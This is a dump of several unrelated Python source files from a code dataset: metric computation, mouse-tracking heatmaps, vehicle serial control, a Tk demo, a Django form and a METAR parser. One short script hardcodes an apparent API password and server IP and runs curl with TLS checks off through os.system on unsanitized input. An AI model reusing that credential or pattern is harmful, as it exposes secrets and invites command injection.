\"a+\")\n#output_file.write(\"e-value\" + \"\\t\"*5 + \"CM\" + \"\\t\"*2 + \"ACC\" + \"\\t\" + \"TPR\" + \"\\t\" + \"FPR\" + \"\\t\" + \"MCC\" + \"\\n\")\n\ntreshold_list = []\nCM_list = []\nACC_list = []\nTPR_list = []\nFPR_list = []\nMCC_list = []\n\n\n#this function is not used in this project, since the e-value tresholds are not decided arbitrarily but are the e-values obtained from hmmsearch\n'''def many_evals(smallest_eval, iterations): #run the confusion_matrix and cm_performance functions for every iteration\n a = float(smallest_eval) #the value chosen as the starting e-value treshold is multiplied by 10**(-1) every cycle\n for i in range(0, int(iterations)):\n eval_treshold = a *(10**(-int(i)))\n eval_list.append(eval_treshold)\n #eval_list.append(eval_treshold**6)\n #eval_list.append(eval_treshold**9)\n cm_performance(confusion_matrix(inputfile, eval_treshold))\n return()'''\n\ndef get_treshold(treshold_input, confusion_input):\n g = open(treshold_input)\n for line in g:\n splitted_line = line.rstrip().split(',')\n treshold_list.append(splitted_line[0])\n cm_performance(confusion_matrix(confusion_input,splitted_line[0]))\n return()\n\ndef confusion_matrix(inputfile, eval_treshold): #generate a confusion matrix from the input file and e-value treshold given\n f = open(inputfile)\n CM = [[],[]] #initialized confusion matrix \n TN = 0 #true negative \n FP = 0 #false positive\n FN = 0 #false negative\n TP = 0 #true positive\n \n #the following cycle verifies if the e-value obtained from the blast alignment is higher or lower than the chosen treshold,\n #and if this corresponds with the assigned class; note: in this case an e-value equal to the treshold is considered a positive result\n for line in f: \n line_list = line.rstrip().split(',')\n if int(line_list[2]) == 0:\n if float(line_list[0]) > float(eval_treshold):\n TN += 1\n else: \n FP += 1\n #print(line_list[1])\n elif int(line_list[2]) == 1:\n if float(line_list[0]) <= float(eval_treshold):\n TP += 1\n else:\n FN += 1\n\n CM[0].append(TP)\n CM[0].append(FP)\n CM[1].append(FN)\n CM[1].append(TN)\n CM_list.append(CM)\n #print(\"CM = \" + str(CM))\n return(CM)\n \n\n\ndef cm_performance(CM): #calculate the performance of the model\n \n TP = CM[0][0] \n FP = CM[0][1]\n FN = CM[1][0]\n TN = CM[1][1] \n \n ACC = (TP+TN)/(TP+FN+TN+FP)\n ACC_list.append(\"%.3f\" %ACC) #accuracy\n \n\n k 
= (TP + FN)\n if k == 0: #to avoid having 0 as a denominator\n TPR = 0\n else: \n TPR = (TP)/(TP+FN)\n TPR_list.append(\"%.3f\" %TPR) #true positive rate\n\n j = (FP + TN)\n if j == 0: #to avoid having 0 as a denominator\n FPR = 0\n else:\n FPR = (FP)/(FP+TN) #false positive ratio\n FPR_list.append(\"%.3f\" %FPR)\n\n MCC_DENOM = sqrt((TP+FP)*(TP+FN)*(TN+FP)*(TN+FN))\n if MCC_DENOM == 0: #to avoid having 0 as a denominator\n MCC_DENOM += 1\n MCC = ((TP*TN)-(FP*FN))/MCC_DENOM #matthews correlation coefficient\n MCC_list.append(\"%.3f\" %MCC)\n return()\n\n\n\nif __name__ == \"__main__\":\n treshold_input = sys.argv[1]\n confusion_input = sys.argv[2]\n #eval_treshold = sys.argv[2]\n #smallest_eval = sys.argv[2]\n #iterations = sys.argv[3]\n #many_evals(smallest_eval, iterations)\n get_treshold(treshold_input, confusion_input)\n for i in range(len(treshold_list)):\n output_file.write(str(treshold_list[i]) + \";\" + str(CM_list[i]) + \";\" + str(ACC_list[i]) + \";\" + str(TPR_list[i]) + \";\" + str(FPR_list[i]) + \";\" + str(MCC_list[i]) + \"\\n\")","sub_path":"second_semester/project/scripts/performance_and_conf_matrix.py","file_name":"performance_and_conf_matrix.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"18711247","text":"import matplotlib\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport seaborn as sns\nimport config as conf\n\n\n# from keras import backend as K\n\n\ndef grayscale_to_rgb(img):\n return np.stack((img,) * 3, axis=-1)\n\n\nclass mouseHandler:\n max_x = 1279.0\n max_y = 1023.0\n\n def __init__(self, matcherId, M=None):\n self.matcherId = matcherId\n if not M:\n self.mouseData = {}\n self.newMouseData = []\n self.dir = conf.dir\n self.processMouseData()\n self.list2dict()\n else:\n self.mouseData = {}\n self.newMouseData = M\n self.list2dict()\n\n def processMouseData(self):\n last_line = None\n try:\n # with open(str(self.dir + 'ExperimentData/' + self.matcherId + '/Excel - CIDX/2.rms')) as f:\n with open(str(self.dir + 'ExperimentData/' + self.matcherId + '/Excel - CIDX/exam.rms')) as f:\n for line in f.readlines():\n line.replace('{', '').replace('}', '').split()\n action, value = line.replace('{', '').replace('}', '').split()[:2]\n if last_line:\n delay = last_line.replace('}', '').split()[1]\n if not '.' 
in delay:\n delay = 0.0\n else:\n delay = ''\n # if action not in self.mouseData:\n # self.mouseData[action] = list()\n if action == 'Move':\n p1, p2 = value.replace('(', '').replace(')', '').split(',')[:2]\n # self.mouseData[action] += [tuple((tuple((float(p1), float(p2))), delay)), ]\n self.newMouseData += [tuple((action, tuple((float(p1), float(p2))), delay)), ]\n elif 'Mouse' in action:\n add = line.replace('{', '').replace('}', '').split()[1:3]\n if 'down' in add:\n p1, p2 = add[1].replace('(', '').replace(')', '').split(',')[:2]\n # self.mouseData[action] += [tuple((tuple((float(p1), float(p2))), delay)), ]\n self.newMouseData += [tuple((action, tuple((float(p1), float(p2))), delay)), ]\n elif 'Delay' in action:\n # self.mouseData[action] += [value, ]\n if isinstance(delay, str):\n delay = 0.0\n self.newMouseData += [tuple((action, None, delay)), ]\n else:\n # self.mouseData[action] += [value, ]\n self.newMouseData += [tuple((action, value, delay)), ]\n last_line = line\n except:\n print('couldnt find data for' + self.matcherId)\n\n def list2dict(self):\n for a in self.newMouseData:\n action = a[0]\n if action not in self.mouseData:\n self.mouseData[action] = list()\n self.mouseData[action] += [tuple(a[1:]), ]\n\n def exportMouseData(self, method, save_heatmaps=False):\n # USE THE LIST!!\n x = []\n y = []\n weights = []\n if method not in self.mouseData:\n return np.zeros((37, 45, 3))\n for k in self.mouseData[method]:\n try:\n d = float(k[1])\n except:\n continue\n i, j = k[0]\n x += [float(i), ]\n y += [float(j), ]\n weights += [d, ]\n if len(x) == 0 or len(y) == 0:\n return\n xedges = list(range(0, int(mouseHandler.max_x) + 100, 30))\n yedges = list(range(0, int(mouseHandler.max_y) + 100, 30))\n # heatmap, _, _ = np.histogram2d(x, y, bins=(xedges, yedges), weights=weights)\n heatmap, _, _ = np.histogram2d(x, y, bins=(xedges, yedges))\n heatmap = heatmap.T\n if save_heatmaps:\n plt.clf()\n map_img = plt.imread(self.dir + 'screen.jpg')\n hmax = sns.heatmap(heatmap,\n cmap='Reds',\n alpha=0.5, # whole heatmap is translucent\n zorder=2,\n cbar=False\n )\n hmax.imshow(map_img,\n aspect=hmax.get_aspect(),\n extent=hmax.get_xlim() + hmax.get_ylim(),\n zorder=1) # put the map under the heatmap\n plt.axis('off')\n if not os.path.exists('./figs/' + method):\n os.makedirs('./figs/' + method)\n plt.savefig('./figs/' + method + '/' + self.matcherId + '.jpg', bbox_inches='tight', format='jpg', dpi=300)\n return grayscale_to_rgb(heatmap)\n\n def split2ns(self, matchers):\n M_list = self.newMouseData\n M_dict = self.mouseData\n sub_matchers_size = len(matchers)\n bucket_size = int(len(self.newMouseData) / sub_matchers_size)\n submouses = {}\n last = 0\n for i, m in enumerate(matchers):\n submouse = M_list[last: (i + 1) * bucket_size]\n last = (i + 1) * bucket_size\n submouses[m] = mouseHandler(m, submouse)\n return submouses\n\n def extract_mouse_features(self):\n total_length = float(len(self.newMouseData))\n total_actions = float(len(self.mouseData.keys()))\n min_x, min_y, max_x, max_y, sum_x, count_pos, sum_y, \\\n total_time, total_dist, max_speed = [0.0, ] * 10\n i = 0\n while i < len(self.newMouseData):\n currElapsedTime = 0.0\n if self.newMouseData[i][0] == 'Delay':\n currElapsedTime += float(self.newMouseData[i][2])\n i += 1\n if i >= len(self.newMouseData): break\n while not isinstance(self.newMouseData[i][1], tuple):\n currElapsedTime += float(self.newMouseData[i][2])\n i += 1\n if i >= len(self.newMouseData): break\n currElapsedTime += float(self.newMouseData[i][2])\n j = i + 1\n if j 
>= len(self.newMouseData): break\n            if self.newMouseData[j][0] == 'Delay':\n                j += 1\n                if j >= len(self.newMouseData): break\n                while not isinstance(self.newMouseData[j][1], tuple):\n                    currElapsedTime += float(self.newMouseData[j][2])\n                    j += 1\n                    if j >= len(self.newMouseData): break\n            if j >= len(self.newMouseData): break\n            # print(self.newMouseData[i], self.newMouseData[j])\n            currElapsedTime += float(self.newMouseData[j][2])\n            currDist = dist(self.newMouseData[i][1], self.newMouseData[j][1])\n            currElapsedTime = currElapsedTime * 60\n            total_time += currElapsedTime\n            total_dist += dist(self.newMouseData[i][1], self.newMouseData[j][1])\n            if currElapsedTime > 0.0:\n                if currDist / currElapsedTime > max_speed:\n                    max_speed = currDist / currElapsedTime\n            x_i, y_i = self.newMouseData[i][1]\n            sum_x += x_i\n            sum_y += y_i\n            count_pos += 1\n            if x_i < min_x:\n                min_x = x_i\n            if x_i > max_x:\n                max_x = x_i\n            if y_i < min_y:\n                min_y = y_i\n            if y_i > max_y:\n                max_y = y_i\n            i = j\n        avg_speed = 0.0\n        if total_time > 0.0:\n            avg_speed = total_dist / total_time\n        avg_x = 0.0\n        avg_x = sum_x / count_pos\n        avg_y = sum_y / count_pos\n        return total_length, total_actions, total_time, total_dist, \\\n            max_speed, min_x, min_y, max_x, max_y, avg_speed, avg_x, avg_y\n\n\ndef dist(a, b):\n    return np.linalg.norm(np.array(a) - np.array(b))\n","sub_path":"mouseHandler.py","file_name":"mouseHandler.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"379356323","text":"import os as my_os\nimport simplejson\n#Setting the server address and port\nserver_ip=\"204.16.245.251\"\nport_number=8890\n\nprint(\"The ip is {0} and port is {1}\".format(server_ip,port_number))\n\n#Setting file to read from\nmy_file=open(\"non_string_links2.txt\",\"r\")\n\nlines =my_file.readlines()\nprint(lines)\nfor line in lines: \n    my_os.system(\"curl -k -u api:87+frP244 -X GET \\https://{0}:{1}{2} >> out.txt\".format(server_ip,port_number,line[4:]))\nmy_file.close()\n","sub_path":"linux_files/my_script_2.py","file_name":"my_script_2.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"653448660","text":"# Communication program\n# Builds packets from the control module's data and sends them to the platform\n# Receives packets from the platform and passes them to the control module\n# See the handbook for the detailed packet format (byte array)\n# input: (from car_control)\n# output: (to car_control)\n\nimport serial\nimport time\nimport math\nimport threading  # for test; the goal is to use multiprocessing in the main code.\n\n# CONSTANTS for _read(), related with encoder\nDISTANCE_PER_ROTATION = 54.02 * math.pi  # Distance per Rotation [cm]\nPULSE_PER_ROTATION = 100.  # Pulse per Rotation\nDISTANCE_PER_PULSE = DISTANCE_PER_ROTATION / PULSE_PER_ROTATION  # Distance per Pulse\n\n\nclass PlatformSerial:\n    def __init__(self, platform_port):\n        self.platform = platform_port  # e.g. /dev/ttyUSB0 on GNU/Linux or COM3 on Windows.\n\n        # Open the port at 115200 baud; make sure the serial port is set up to match in the OS as well\n        try:\n            self.ser = serial.Serial(self.platform, 115200)  # Baud rate such as 9600 or 115200 etc.\n        except Exception as e:\n            print(e)\n\n        self.reading_data = bytearray([0 for i in range(14)])\n        # outgoing write-data buffer\n        self.writing_data = bytearray.fromhex(\"5354580000000000000001000D0A\")\n        self.speed_for_write = 0\n        self.steer_for_write = 0\n        self.brake_for_write = 0\n        self.check = 0\n        self.present_time = 0\n        self.past_time = 0\n\n        self.ct1 = 0\n        self.ct2 = 0\n        self.sit = 0\n\n    def _read(self):  # read data from platform\n        reading_data = bytearray(self.ser.readline())  # read in as a byte array\n        self.reading_data = reading_data\n        try:\n            # data parsing; see the handbook for the packet description\n            ETX1 = reading_data[17]\n            AorM = reading_data[3]\n            ESTOP = reading_data[4]\n            GEAR = reading_data[5]\n            SPEED = reading_data[6] + reading_data[7] * 256\n            STEER = reading_data[8] + reading_data[9] * 256\n\n            # adjust the STEER range\n            if STEER >= 32768:  # 65536 / 2 = 32768\n                STEER = 65536 - STEER\n            else:\n                STEER = -STEER\n\n            BRAKE = reading_data[10]\n            time_encoder = time.time()\n\n            # ENC0, ENC1, ENC2, ENC3\n            ENC = reading_data[11] + reading_data[12] * 256 + reading_data[13] * 65536 + reading_data[14] * 16777216\n            if ENC >= 2147483648:\n                ENC = ENC - 4294967296\n\n            ALIVE = reading_data[15]\n\n            try:\n                speed_from_encoder = (ENC - self.ENC1[0]) * DISTANCE_PER_PULSE / (time_encoder - self.ENC1[1]) * 0.036\n                print('STEER = ', STEER, ' SPEED_ENC = ', speed_from_encoder)\n            except Exception as e:\n                print(e)\n                pass\n\n            self.ENC1 = (ENC, time_encoder)  # stored as self.ENC1 so the encoder-speed math above and the test routine below can read it\n\n        except:\n            pass\n
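\n    # --- Illustrative sketch (editor's addition, assumptions flagged): the field\n    # arithmetic in _read() above can be cross-checked with the standard-library\n    # struct module. The layout (bytes 6-7 speed, 8-9 steer, 10 brake, 11-14 encoder,\n    # little-endian) is assumed from the manual parsing; the sign flip on steer\n    # mirrors the if/else in _read().\n    @staticmethod\n    def unpack_status_sketch(packet):\n        import struct\n        speed, steer = struct.unpack_from('<Hh', packet, 6)  # u16 speed, s16 steer\n        (enc,) = struct.unpack_from('<i', packet, 11)  # s32 encoder count\n        return speed, -steer, packet[10], enc\n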
\n    def _write(self, speed_for_write=0, steer_for_write=0, brake_for_write=0):  # write data to platform\n        dummy_data = bytearray([0 for i in range(14)])\n        if not speed_for_write == 0:\n            self.speed_for_write = speed_for_write\n        if not steer_for_write == 0:\n            self.steer_for_write = steer_for_write\n        if not brake_for_write == 0:\n            self.brake_for_write = brake_for_write\n\n        try:\n            self.steer_for_write = int(self.steer_for_write * 1.015)\n\n            if self.steer_for_write < 0:\n                self.steer_for_write = self.steer_for_write + 65536\n\n            print(\"steer_for_write = \", self.steer_for_write, \"/ speed_for_write = \", self.speed_for_write,\n                  \"/ BRAKE = \",\n                  self.brake_for_write)\n\n            # set speed\n            dummy_data[6] = 0\n            dummy_data[7] = self.speed_for_write\n\n            # set steer, transmitted as two hex bytes\n            dummy_data[8] = int(self.steer_for_write / 256)\n            dummy_data[9] = self.steer_for_write % 256\n\n            self.writing_data[3] = 1  # AorM\n            self.writing_data[4] = 0  # E stop\n            self.writing_data[5] = 0  # GEAR\n\n            # copy the scratch data into the final packet\n            self.writing_data[6] = dummy_data[6]\n            self.writing_data[7] = dummy_data[7]\n            self.writing_data[8] = dummy_data[8]\n            self.writing_data[9] = dummy_data[9]\n            self.writing_data[10] = self.brake_for_write\n\n            # echo these bytes back unchanged so the platform can track its own receive interval\n            self.writing_data[11] = self.reading_data[15]\n            self.writing_data[12] = self.reading_data[16]\n            self.writing_data[13] = self.reading_data[17]\n\n            self.ser.write(bytearray(self.writing_data))\n\n        except Exception as e:\n            print(e)\n            print(' auto error')\n            self.ser.write(bytearray(self.writing_data))\n            pass\n
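\n    # --- Illustrative sketch (editor's addition): the 14-byte command frame that\n    # _write() fills in field-by-field could be packed in one expression. Framing and\n    # field order are assumed from the default \"5354580000000000000001000D0A\" buffer\n    # above (big-endian 16-bit speed/steer, per the /256 and %256 arithmetic).\n    @staticmethod\n    def pack_command_sketch(speed, steer, brake, alive):\n        import struct\n        if steer < 0:\n            steer += 65536  # same unsigned wrap as _write()\n        return (b'STX' + bytes([1, 0, 0]) + struct.pack('>HH', speed, steer)\n                + bytes([brake, alive]) + bytes([0x0D, 0x0A]))\n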
\n    def get_data_real_time(self):\n        # read platform data in real time using _read()\n        try:\n            while True:\n                self._read()\n        except KeyboardInterrupt:  # exit on Ctrl+C - doesn't seem to work, though?\n            pass\n        self.ser.close()\n\n    def test_write_to_platform(self):\n\n        self.speed_for_write = 0\n        self.steer_for_write = 0\n        self.brake_for_write = 0\n\n        if self.sit == 0:\n            self.steer_for_write = 0\n            self.speed_for_write = 36\n\n        if self.ct1 == 0:\n            self.ct1 = self.ENC1[0]\n            self.ct2 = self.ENC1[0]\n\n        if (self.ct2 - self.ct1) < 100:\n            self.steer_for_write = 0\n            self.speed_for_write = 36\n\n        elif 100 <= (self.ct2 - self.ct1) < 325:\n            self.steer_for_write = -1970\n            self.speed_for_write = 36\n\n        elif 325 <= (self.ct2 - self.ct1) < 425:\n            self.steer_for_write = 0\n            self.speed_for_write = 36\n\n        else:\n            self.steer_for_write = 0\n            self.speed_for_write = 0\n\n        print(self.ct1)\n        print(\"****\")\n        print(self.ct2)\n        print(\"****\")\n        print(self.ENC1[0])\n        print(\"****\")\n        print(self.ENC1[1])\n        print(\"****\")\n\n\n    def test_communication_main(self):\n        read_thread = threading.Thread(target=self._read)  # pass the methods themselves; do not call them here\n        write_thread = threading.Thread(target=self._write)\n        test_write_thread = threading.Thread(target=self.test_write_to_platform)\n\n        read_thread.start()\n        write_thread.start()\n        test_write_thread.start()\n\n\nif __name__ == '__main__':\n    port = 'COM7'\n    # e.g. /dev/ttyUSB0 on GNU/Linux or COM3 on Windows.\n    platform = PlatformSerial(port)\n    print('CONNECTED')\n\n    while True:\n        platform.test_communication_main()\n","sub_path":"rsc/CarControl/test_code_control.py","file_name":"test_code_control.py","file_ext":"py","file_size_in_byte":6874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"466122667","text":"#!python3\nimport os\nimport tkinter as tk\n\n\nclass SampleTkApp(tk.Frame):\n    \"\"\"Simple TK GUI application coded to practice GUI-development\n\n    Practise well :) ...\n    \"\"\"\n\n    def __init__(self, master):\n        tk.Frame.__init__(self, master)\n        self.master = master\n        self.pack()\n        self.master.title(\"hello World... from TK\")\n\n        dialog_frm = tk.Frame(self)\n        dialog_frm.pack(padx=20, pady=15)\n        tk.Label(dialog_frm, text=\"This is label-frame Tk App..\").pack()\n\n        button_frm = tk.Frame(self)\n        button_frm.pack(padx=15, pady=(0, 15))\n\n        tk.Button(\n            button_frm, text=\"Ok\", default='active',\n            command=lambda: self.click_command('Ok')\n        ).pack(side='right')\n\n        tk.Button(\n            button_frm, text=\"Cancel\", default='active',\n            command=lambda: self.click_command('Cancel')\n        ).pack(side='right')\n\n        self.entry = tk.StringVar()\n        tk.Entry(self, text=\"Hello All...\", textvariable=self.entry).pack()\n\n    def click_command(self, name):\n        \"\"\"Command to run when Buttons are pressed in a frame\n        \"\"\"\n        print(f'{self.entry.get()} clicked {name}')\n        if(name.lower() == 'cancel'):\n            self.master.destroy()\n\n\nif __name__ == \"__main__\":\n    root = tk.Tk()\n    app = SampleTkApp(root)\n    print(f'starting the app... 
please close it once done with working...')\n app.mainloop()\n","sub_path":"SampleTkApp.py","file_name":"SampleTkApp.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"329440077","text":"from django import forms\n\nclass ContactForm(forms.Form):\n\n def __init__(self, *args, **kwargs):\n super(ContactForm, self).__init__(*args, **kwargs)\n CHOICES3 = (('1','First'),('2','Second'),)\n self.fields['field1'] = forms.CharField(label='Field Text', max_length=64)\n self.fields['field2'] = forms.CharField(label='Field Long Text', max_length=240, widget=forms.Textarea)\n self.fields['field3'] = forms.ChoiceField(label='Field MultiChoices', widget=forms.CheckboxSelectMultiple, choices=CHOICES3 ) ","sub_path":"djapps/djajax/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635685018","text":"from __future__ import division\nimport logging\nimport re\nfrom collections import namedtuple\nfrom datetime import datetime\n\nfrom ..package_tools import Exporter\nfrom .text import ParseError, RegexParser, WMOTextProduct, parse_wmo_time\nfrom ..units import units\n\nexporter = Exporter(globals())\n\nlog = logging.getLogger('metpy.io.metar')\nlog.addHandler(logging.StreamHandler()) # Python 2.7 needs a handler set\nlog.setLevel(logging.WARNING)\n\n\ndef raise_parse_error(msg, *args):\n 'Format message and raise as an error'\n raise ParseError(msg % args)\n\n\nclass MetarProduct(WMOTextProduct):\n def _parse(self, it):\n # Handle NWS style where it's just specified once at the top rather than per METAR\n if it.peek() in ('METAR', 'SPECI'):\n def_kind = next(it)\n else:\n def_kind = 'METAR'\n\n it.linesep = '=[\\n]{0,2}'\n self.reports = []\n\n parser = MetarParser(default_kind=def_kind, ref_time=self.datetime)\n for l in it:\n # Skip SAOs\n if l[3:7] != ' SA ':\n report = parser.parse(l)\n # Only add the report if it's not empty\n if report:\n self.reports.append(report)\n\n def __str__(self):\n return (super(MetarProduct, self).__str__() + '\\n\\tReports:' +\n '\\n\\t\\t'.join(map(str, self.reports)))\n\n\ndef as_value(val, units):\n 'Parse a value from a METAR report, attaching units'\n try:\n if val is None:\n return None\n elif val[0] in 'MP':\n log.warning('Got unhandled M/P value: %s', val)\n val = val[1:]\n elif val == '/' * len(val):\n val = 'NaN'\n return float(val) * units\n except (AttributeError, TypeError, ValueError) as e:\n raise ParseError('Could not parse \"%s\" as a value' % val)\n\n\n# Helper for parsing. Generates a function to grab a given group from the matches, optionally\n# applying a converter\ndef grab_group(group, conv=None):\n if conv:\n def process(matches, *args):\n return conv(matches[group])\n else:\n def process(matches, *args):\n return matches[group]\n return process\n\n\nclass MetarParser(object):\n 'Class that parses a single METAR report'\n def __init__(self, default_kind='METAR', ref_time=None):\n # Reports should start with METAR/SPECI, but of course NWS doesn't actually\n # do this...\n self.default_kind = default_kind\n\n # Can specify the appropriate date for year/month. 
Defaults to using current\n self.ref_time = ref_time if ref_time else datetime.utcnow()\n\n # Main expected groups in the report\n self.main_groups = [('kind', kind(default_kind)), ('stid', stid),\n ('datetime', dt(ref_time)), ('null', null), ('auto', auto),\n ('corrected', corrected),\n ('wind', wind), ('visibility', vis), ('runway_range', rvr),\n ('present_wx', wx), ('sky_coverage', sky_cover),\n ('temperature', basic_temp), ('altimeter', altimeter),\n ('runway_state', runway_state)]\n\n # Complete set of possible groups in the remarks section\n self.remarks = [('volcano', volcano), ('automated', automated_type),\n ('peak_wind', peak_wind), ('wind_shift', wind_shift),\n ('sfc_vis', sfc_vis),\n ('variable_vis', var_vis), ('sector_vis', sector_vis),\n ('lightning', lightning),\n ('precip_times', precip_times), ('thunderstorm', thunderstorm),\n ('virga', virga),\n ('variable_ceiling', var_ceiling), ('variable_sky_cover', var_sky),\n ('significant_clouds', sig_cloud), ('mountains', mountains),\n ('pressure_change', pressure_change),\n ('sea_level_pressure', slp), ('no_speci', nospeci),\n ('report_sequence', report_sequence),\n ('hourly_precip', hourly_precip), ('period_precip', period_precip),\n ('snow_6hr', snow_6hr), ('snow_depth', snow_depth),\n ('snow_liquid_equivalent', snow_liquid_equivalent),\n ('hourly_ice', hourly_ice), ('ice_3hr', ice_3hr), ('ice_6hr', ice_6hr),\n ('daily_precip', daily_precip), ('cloud_types', cloud_types),\n ('hourly_temperature', hourly_temp), ('max_temp_6hr', max_temp_6hr),\n ('min_temp_6hr', min_temp_6hr),\n ('daily_temperature', daily_temp_range),\n ('pressure_tendency_3hr', press_tend),\n ('non-operational sensors', non_op_sensors),\n ('pilot', pilot_remark), ('needs_maintenance', maint), ('null', null)]\n\n self.clean_whitespace = re.compile('\\s+')\n\n def parse(self, report):\n 'Parses the report and returns a dictionary of parsed results'\n report = self.clean_whitespace.sub(' ', report)\n ob = dict(report=report, null=False)\n\n # Split into main and remark sections so we can treat slightly differently\n if 'RMK' in report:\n main, remark = report.split('RMK', 1)\n else:\n main = report\n remark = ''\n\n # Handle badly formatted report where there is no main section\n if not main.strip():\n return dict()\n\n # Need to split out the trend forecast, otherwise will break parsing\n split = trend_forecast_regex.split(main, 1)\n if len(split) > 1:\n main, match, trend = trend_forecast_regex.split(main, 1)\n trend = trend.strip()\n if trend:\n trend_store = dict()\n trend = self._look_for_groups(trend, self.main_groups, trend_store)\n trend_store['unparsed'] = trend\n ob['trend_forecast'] = (match, trend_store)\n else:\n ob['trend_forecast'] = match\n\n # Start with the main groups. Get back what remains of the report\n main = self._look_for_groups(main, self.main_groups, ob)\n\n # If we have anything left now, it's un-parsed data and we should flag it. 
We check\n # to make sure it's actually useful leftovers\n if main and set(main) - set(' /'):\n ob['unparsed'] = main.strip()\n\n # If we have a remarks section, try to parse it\n if remark:\n # The groups in the remarks rely upon information from earlier in the report,\n # like the current time or units\n speed_units = ob['wind']['speed'].units if 'wind' in ob else units.knot\n context = dict(datetime=ob.get('datetime', self.ref_time),\n speed_units=units.Quantity(1.0, speed_units))\n\n remark = self._look_for_groups_reduce(remark, self.remarks, ob, context)\n if remark:\n ob['remarks'] = remark\n\n # Handle parsing garbage by checking for either datetime or null report\n if ob['null'] or ('datetime' in ob and 'stid' in ob):\n return ob\n else:\n return dict()\n\n def _look_for_groups(self, string, groups, store, *context):\n # Walk through the list of (name, group) and try parsing the report with the group.\n # This will return the string that was parsed, so that we can keep track of where\n # we are in the string. We use a while loop so that we can repeat a group if\n # appropriate.\n string = string.strip()\n cursor = 0\n leftover = []\n groups = iter(groups)\n name, group = next(groups)\n while True:\n # Skip spaces and newlines, won't exceed end because no trailing whitespace\n while string[cursor] == ' ':\n cursor += 1\n\n # Try to parse using the group.\n try:\n rng, data = group.parse(string, cursor, *context)\n except ParseError as e:\n log.exception('Error while parsing (%s)', string, exc_info=e)\n rng = data = None\n\n # If we got back a range, that means the group succeeded in parsing\n if rng:\n start, end = rng\n log.debug('%s parsed %s', name, string[start:end])\n\n # If the match didn't start at the cursor, that means we skipped some\n # data and should flag as necessary\n if start > cursor:\n leftover.append(string[cursor:start].strip())\n\n # Update the cursor in the string to where the group finished parsing\n cursor = end\n\n # If we got back some data, we should store. Possible to get back a default\n # value even if no parsing done.\n if data is not None:\n log.debug('%s returned %s', name, data)\n\n # If it's a repeated group, we store in a list regardless\n if group.repeat and group.keepall:\n store.setdefault(name, []).append(data)\n else:\n store[name] = data\n\n # If we've finished the string, get out\n if cursor >= len(string):\n break\n\n # If we shouldn't repeat the group, get the next one\n if not group.repeat or data is None:\n try:\n name, group = next(groups)\n except StopIteration:\n break\n\n # Return what remains of the string (removing whitespace)\n leftover.append(string[cursor:].strip())\n return ' '.join(leftover)\n\n def _look_for_groups_reduce(self, string, groups, store, *context):\n # Walk through the list of (name, group) and try parsing the report with the group.\n # This will return the string that was parsed, so that we can keep track of where\n # we are in the string. We use a while loop so that we can repeat a group if\n # appropriate.\n string = string.strip()\n groups = iter(groups)\n name, group = next(groups)\n while True:\n # Try to parse using the group.\n rng, data = group.parse(string, 0, *context)\n\n # If we got back a range, that means the group succeeded in parsing\n if rng:\n start, end = rng\n log.debug('%s parsed %s', name, string[start:end])\n\n string = string[:start].strip() + ' ' + string[end:].strip()\n\n # If we got back some data, we should store. 
Possible to get back a default\n                # value even if no parsing done.\n                if data is not None:\n                    log.debug('%s returned %s', name, data)\n\n                    # If it's a repeated group, we store in a list regardless\n                    if group.repeat and group.keepall:\n                        store.setdefault(name, []).append(data)\n                    else:\n                        store[name] = data\n\n            # If we shouldn't repeat the group, get the next one\n            if not group.repeat or data is None:\n                try:\n                    name, group = next(groups)\n                except StopIteration:\n                    break\n\n        # Return what remains of the string (removing whitespace)\n        return string.strip()\n\n#\n# Parsers for METAR groups -- main report\n#\n\n\n# Parse out METAR/SPECI\ndef kind(default):\n    return RegexParser(r'\b(?P<kind>METAR|SPECI)\b', grab_group('kind'), default=default)\n\n# Grab STID (CCCC)\nstid = RegexParser(r'\b(?P<stid>[0-9A-Z]{4})\b', grab_group('stid'))\n\n\n# Process the datetime in METAR to a full datetime (YYGGggZ)\ndef dt(ref_time):\n    return RegexParser(r'\b(?P<datetime>[0-3]\d[0-5]\d[0-5]\dZ)',\n                       lambda matches: parse_wmo_time(matches['datetime'], ref_time))\n\n# Look for AUTO\nauto = RegexParser(r'\b(?P<auto>AUTO)', grab_group('auto', bool), default=False)\n\n# Look for COR\ncorrected = RegexParser(r'\b(?P<cor>COR)\b', grab_group('cor', bool), default=False)\n\n# Look for NIL reports\nnull = RegexParser(r'\b(?P<null>NIL)', grab_group('null', bool), default=False)\n\n\n# Process the full wind group (dddfffGfffKT dddVddd)\ndef process_wind(matches):\n    speed_unit = units('m/s') if matches.pop('units') == 'MPS' else units.knot\n    if matches['direction'] != 'VRB':\n        matches['direction'] = as_value(matches['direction'], units.deg)\n    matches['speed'] = as_value(matches['speed'], speed_unit)\n    matches['gust'] = as_value(matches['gust'], speed_unit)\n    matches['dir1'] = as_value(matches['dir1'], units.deg)\n    matches['dir2'] = as_value(matches['dir2'], units.deg)\n    return matches\n\nwind = RegexParser(r'''(?P<direction>VRB|///|[0-3]\d{2})\n                       (?P<speed>P?[\d]{2,3}|//)\n                       (G(?P<gust>P?\d{2,3}))?\n                       ((?P<units>KT|MPS)|\b|\ )\n                       (\ (?P<dir1>\d{3})V(?P<dir2>\d{3}))?''', process_wind)\n\n\n# The visibility group (VVVVV)\nfrac_conv = {'1/4': 1 / 4, '1/2': 1 / 2, '3/4': 3 / 4,\n             '1/8': 1 / 8, '3/8': 3 / 8, '5/8': 5 / 8, '7/8': 7 / 8,\n             '1/16': 1 / 16, '3/16': 3 / 16, '5/16': 5 / 16, '7/16': 7 / 16,\n             '9/16': 9 / 16, '11/16': 11 / 16, '13/16': 13 / 16, '15/16': 15 / 16}\n\n\ndef frac_to_float(frac):\n    try:\n        return frac_conv[frac]\n    except KeyError:\n        raise ParseError('%s is not a valid visibility fraction' % 